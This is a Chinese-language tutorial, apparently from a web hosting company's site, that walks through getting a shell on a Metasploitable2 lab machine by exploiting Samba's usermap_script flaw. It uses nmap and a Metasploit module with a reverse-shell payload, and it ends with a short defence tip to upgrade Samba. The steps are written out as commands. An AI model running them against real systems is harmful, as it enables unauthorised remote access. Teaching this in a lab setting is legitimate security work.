这篇文章主要介绍“如何利用samba服务漏洞获取主机shell”,在日常操作中,相信很多人在如何利用samba服务漏洞获取主机shell问题上存在疑惑,小编查阅了各式资料,整理出简单好用的操作方法,希望对大家解答”如何利用samba服务漏洞获取主机shell”的疑惑有所帮助!接下来,请跟着小编一起来学习吧!
本次靶机的运行系统是metasploitable2, 它是一个特制的ubuntu操作系统,主要用于安全工具测试和演示常见的漏洞攻击。
利用nmap扫描并查看系统开放端口和相应的的应用程序,命令为nmap -sV 靶机地址,其中s是scan,V是version。
查看445端口和139端口中运行着samba3.X-4.X的服务,samba是一款基于SMB(server message block)协议的免费软件,SMB用于在局域网内共享打印机和文件。
打开Metasploit工具,在msf下输入search samba,查找可利用的漏洞模块。
选择exploit/multi/samba/usermap_script,因为它被标记为excellent,输入use exploit/multi/samba/usermap_script,利用该模块,使用show payloads命令查看该模块下的payload。
因为目标机是linux机,所以选择linux的载荷,这里选择基础的cmd/unix/reverse反向攻击载荷模块,选择命令set payload cmd/unix/reverse。
设置靶机地址:set RHOST 靶机地址
设置漏洞端口:set RPORT 445
设置攻击机地址:set LHOST 攻击机地址
使用 show options命令查看配置是否正确。
输入exploit或run命令进行攻击,成功获取目标的主机的shell。
以上以linux系统渗透为例,windows系统的渗透过程其实也差不多,只不过可能利用的漏洞模块和载荷的组合方式可能不一样。防御方法:将samba服务升级到最新版本,即可防御该漏洞。
免责声明:本站发布的内容(图片、视频和文字)以原创、来自互联网转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系QQ:712375056 进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。
Copyright © 2009-2021 56dr.com. All Rights Reserved. 特网科技 特网云 版权所有 珠海市特网科技有限公司 粤ICP备16109289号
域名注册服务机构:阿里云计算有限公司(万网) 域名服务机构:烟台帝思普网络科技有限公司(DNSPod) CDN服务:阿里云计算有限公司 中国互联网举报中心 增值电信业务经营许可证B2
建议您使用Chrome、Firefox、Edge、IE10及以上版本和360等主流浏览器浏览本网站